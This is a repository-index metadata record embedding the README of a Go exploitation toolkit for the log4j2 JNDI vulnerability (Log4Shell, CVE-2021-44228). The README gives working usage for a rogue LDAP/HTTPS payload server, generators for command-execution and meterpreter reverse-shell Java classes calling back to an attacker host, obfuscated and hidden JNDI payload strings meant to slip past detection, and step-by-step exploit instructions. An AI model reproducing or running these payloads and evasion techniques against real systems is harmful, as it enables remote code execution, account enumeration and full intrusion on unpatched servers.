{"id":20298311,"url":"https://github.com/for-acgn/log4shell","last_synced_at":"2025-08-17T16:54:08.700Z","repository":{"id":57644570,"uuid":"438878685","full_name":"For-ACGN/Log4Shell","owner":"For-ACGN","description":"Check, exploit, generate class, obfuscate, TLS, ACME about log4j2 vulnerability in one Go program.","archived":false,"fork":false,"pushed_at":"2021-12-23T09:01:10.000Z","size":4828,"stargazers_count":57,"open_issues_count":0,"forks_count":17,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-06-22T18:05:42.887Z","etag":null,"topics":["acme","cve-2021-44228","exploits","java","jndi","ldap","log4j2","log4j2-exp","log4shell","obfuscate","poc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/For-ACGN.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-12-16T06:06:55.000Z","updated_at":"2025-01-09T01:31:51.000Z","dependencies_parsed_at":"2022-08-30T08:11:23.447Z","dependency_job_id":null,"html_url":"https://github.com/For-ACGN/Log4Shell","commit_stats":null,"previous_names":["for-acgn/log4j2-exp"],"tags_count":5,"template":false,"template_full_name":null,"purl":"pkg:github/For-ACGN/Log4Shell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/For-ACGN%2FLog4Shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/For-ACGN%2FLog4Shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/For-ACGN%2FLog4Shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/For-ACGN%2FLog4Shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/For-ACGN","download_url":"https://codeload.github.com/For-ACGN/Log4Shell/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/For-ACGN%2FLog4Shell/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":261338953,"owners_count":23143892,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["acme","cve-2021-44228","exploits","java","jndi","ldap","log4j2","log4j2-exp","log4shell","obfuscate","poc"],"created_at":"2024-11-14T16:09:08.847Z","updated_at":"2025-06-22T18:05:55.879Z","avatar_url":"https://github.com/For-ACGN.png","language":"Go","readme":"# Log4Shell\n [![GitHub Actions](https://github.com/For-ACGN/Log4Shell/workflows/Go/badge.svg)](https://github.com/For-ACGN/Log4Shell/actions)\n [![Go Report Card](https://goreportcard.com/badge/github.com/For-ACGN/Log4Shell)](https://goreportcard.com/report/github.com/For-ACGN/Log4Shell)\n [![GoDoc](https://godoc.org/github.com/For-ACGN/Log4Shell?status.svg)](http://godoc.org/github.com/For-ACGN/Log4Shell)\n [![License](https://img.shields.io/github/license/For-ACGN/Log4Shell.svg)](https://github.com/For-ACGN/Log4Shell/blob/master/LICENSE)\\\n Check, exploit, generate class, obfuscate, TLS, ACME about log4j2 vulnerability in one Go program. \n\n## Feature\n * Only one program and easy deployment\n * Support common operating systems\n * Support multi Java class files\n * Support LDAPS and HTTPS server\n * Support ACME to sign certificate\n * Generate class without Java compiler\n * Support obfuscate malicious(payload)\n * Hide malicious(payload) string\n * Add secret to protect HTTP server\n * Add token to fix repeat execute payload\n\n## Usage\n ### Start Log4Shell server\n   * ```Log4Shell.exe -host \"1.1.1.1\"```\n   * ```Log4Shell.exe -host \"example.com\"```\n \n ### Start Log4Shell server with TLS\n   * ```Log4Shell.exe -host \"example.com\" -tls-server -tls-cert \"cert.pem\" -tls-key \"key.pem\"```\n   * ```Log4Shell.exe -host \"1.1.1.1\" -tls-server -tls-cert \"cert.pem\" -tls-key \"key.pem\"``` (need IP SANs)\n\n ### Start Log4Shell server with ACME\n   * ```Log4Shell.exe -host \"example.com\" -auto-cert``` (must use domain name)\n\n ### Generate Java class file\n   ```\n   Execute(no output):\n     Log4Shell.exe -gen \"execute\" -args \"-cmd calc\" -class \"Test\"\n\n   System(with output):\n     Log4Shell.exe -gen \"system\" -args \"-bin cmd -args \\\"/c net user\\\"\" -class \"Test\"\n\n   ReverseTCP(java/meterpreter/reverse_tcp):      // template will be open source after some time\n     Log4Shell.exe -gen \"reverse_tcp\" -args \"-lhost 1.1.1.1 -lport 9979\" -class \"Test\"\n\n   ReverseHTTPS(java/meterpreter/reverse_https):  // template will be open source after some time\n     Log4Shell.exe -gen \"reverse_https\" -args \"-lhost 1.1.1.1 -lport 8443 -luri test\" -class \"Test\"  \n\n   The generated class file will be saved to the payload directory(can set output flag)\n   ```\n\n ### Obfuscate malicious(payload) string\n   ```\n   Log4Shell.exe -obf \"${jndi:ldap://1.1.1.1:3890/Calc}\"\n   ```\n   ```\n   raw: ${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}\n\n   ${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-\n   da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:w@q.tjyo\n   @-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.m\n   Q:g6@jJ:-z}3z${uY)u:7S2)P4ihH:M_S8fanL@AeX-PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s\n   :-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}\n\n   Each string can only be used once, or wait 20 seconds.\n   ```\n   ```\n   When obfuscate malicious(payload) string, log4j2 package will repeat execute it, the number of\n   repetitions is equal the number of occurrences about string \"${\". The LDAP server add a simple\n   token mechanism for prevent it. \n   ```\n   \n  ### Hide malicious(payload) string\n   ```\n   Log4Shell.exe -obf \"${jndi:ldap://127.0.0.1:3890/Calc}\" -hide\n   ```\n   ```\n   raw: ${jndi:ldap://127.0.0.1:3890/Calc$YG=.z[.od7rH0XpE}\n   ```\n   ```\n   Execute VulApp:\n   \n   E:\\OneDrive\\Projects\\Golang\\GitHub\\Log4Shell\\vulapp\\jar\u003eD:\\Java\\jdk1.8.0_121\\bin\\java -jar \n   vulapp.jar ${j${0395i1-WV[nM-Pv:-nd}i${KoxnAt-KVA6T4:Xggnr:-}:${vlt0_:xTI:-}${kMe=A:QD3FK:\n   -l}d${SaS-TmMt:-a}${uQH-oRFIXtw-4[:-}p:${XL9-bkp9k]-xz:-//}12${D@-rF@wGm:-7.0}.${Fuc:SCV6B\n   m:-}${W1eelS:1jnUDknTJS:*7aHahf2m:vK:-0.1}${ft:4Zbf5Hf1G:Tskg:-:3}${6WH[wc:Fencc:-8}${24Y:\n   5h=5SqK-p(X9:-9}${oYCk6-RDIN5a$Od:U]3iOEVv:7MiEj:-0/C}${NzvB:]6T9$_O9-F.IUl-NnZq:-a}lc$YG=\n   ${*E-5M:-.z[}${N_9@-6(l0sy-b(6.6t-y7NC*:-}${0i-4eS4kB:-.}${5WnL-LKTO554q-x[d:-od7}rH0$${oC\n   :.XYPyzv6-sPH.]*Ls:$@Q:-XpE}}\n   ${j${0395i1-WV[nM-Pv:-nd}i${KoxnAt-KVA6T4:Xggnr:-}:${vlt0_:xTI:-}${kMe=A:QD3FK:-l}d${SaS-T\n   mMt:-a}${uQH-oRFIXtw-4[:-}p:${XL9-bkp9k]-xz:-//}12${D@-rF@wGm:-7.0}.${Fuc:SCV6Bm:-}${W1eel\n   S:1jnUDknTJS:*7aHahf2m:vK:-0.1}${ft:4Zbf5Hf1G:Tskg:-:3}${6WH[wc:Fencc:-8}${24Y:5h=5SqK-p(X\n   9:-9}${oYCk6-RDIN5a$Od:U]3iOEVv:7MiEj:-0/C}${NzvB:]6T9$_O9-F.IUl-NnZq:-a}lc$YG=${*E-5M:-.z\n   [}${N_9@-6(l0sy-b(6.6t-y7NC*:-}${0i-4eS4kB:-.}${5WnL-LKTO554q-x[d:-od7}rH0$${oC:.XYPyzv6-s\n   PH.]*Ls:$@Q:-XpE}}\n   15:49:14.676 [main] ERROR log4j - XpE}\n\n   E:\\OneDrive\\Projects\\Golang\\GitHub\\Log4Shell\\vulapp\\jar\u003e\n   ```\n   ```\n   The Logger will only record a part of raw string \"15:49:14.676 [main] ERROR log4j - XpE}\",\n   and repeat execute will not appear(I don't know why this happened).\n   ```\n\n## Check\n * start Log4Shell server\n * send ```${jndi:ldap://1.1.1.1:3890/Nop}```\n * send ```${jndi:ldaps://example.com:3890/Nop}``` with TLS\n\n## Exploit\n * start Log4Shell server\n * put your class file to the payload directory\n * send ```${jndi:ldap://1.1.1.1:3890/Meterpreter}```\n * send ```${jndi:ldaps://example.com:3890/Meterpreter}``` with TLS\n * meterpreter will open source after some time\n\n## VulApp\n * VulApp is a vulnerable Java program that use log4j2 package.\n * You can use it for develop this project easily.\n * ```java -jar vulapp.jar ${jndi:ldap://127.0.0.1:3890/Calc}```\n\n## Help\n  ```\n  :::      ::::::::   ::::::::      :::     ::::::::  :::    ::: :::::::::: :::      :::\n  :+:     :+:    :+: :+:    :+:    :+:     :+:    :+: :+:    :+: :+:        :+:      :+:\n  +:+     +:+    +:+ +:+          +:+ +:+  +:+        +:+    +:+ +:+        +:+      +:+\n  +#+     +#+    +:+ :#:         +#+  +:+  +#++:++#++ +#++:++#++ +#++:++#   +#+      +#+\n  +#+     +#+    +#+ +#+   +#+# +#+#+#+#+#+       +#+ +#+    +#+ +#+        +#+      +#+\n  #+#     #+#    #+# #+#    #+#       #+#  #+#    #+# #+#    #+# #+#        #+#      #+#\n  ######## ########   ########        ###   ########  ###    ### ########## ######## ########\n\n                                                        https://github.com/For-ACGN/Log4Shell\n\nUsage of Log4Shell.exe:\n  -args string\n        arguments about generate Java class file\n  -auto-cert\n        use ACME client to sign certificate automatically\n  -class string\n        specify the new class name\n  -gen string\n        generate Java class file with template name\n  -hide\n        hide obfuscated malicious(payload) string in log4j2\n  -host string\n        server IP address or domain name (default \"127.0.0.1\")\n  -http-addr string\n        http server address (default \":8080\")\n  -http-net string\n        http server network (default \"tcp\")\n  -ldap-addr string\n        ldap server address (default \":3890\")\n  -ldap-net string\n        ldap server network (default \"tcp\")\n  -no-token\n        not add random token when use obfuscate\n  -obf string\n        obfuscate malicious(payload) string\n  -output string\n        generated Java class file output path\n  -payload string\n        payload(java class) directory (default \"payload\")\n  -tls-cert string\n        tls certificate file path (default \"cert.pem\")\n  -tls-key string\n        tls private key file path (default \"key.pem\")\n  -tls-server\n        enable ldaps and https server\n  ```\n\n## Screenshot\n![](https://github.com/For-ACGN/Log4Shell/raw/main/screenshot.png)\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffor-acgn%2Flog4shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ffor-acgn%2Flog4shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffor-acgn%2Flog4shell/lists"}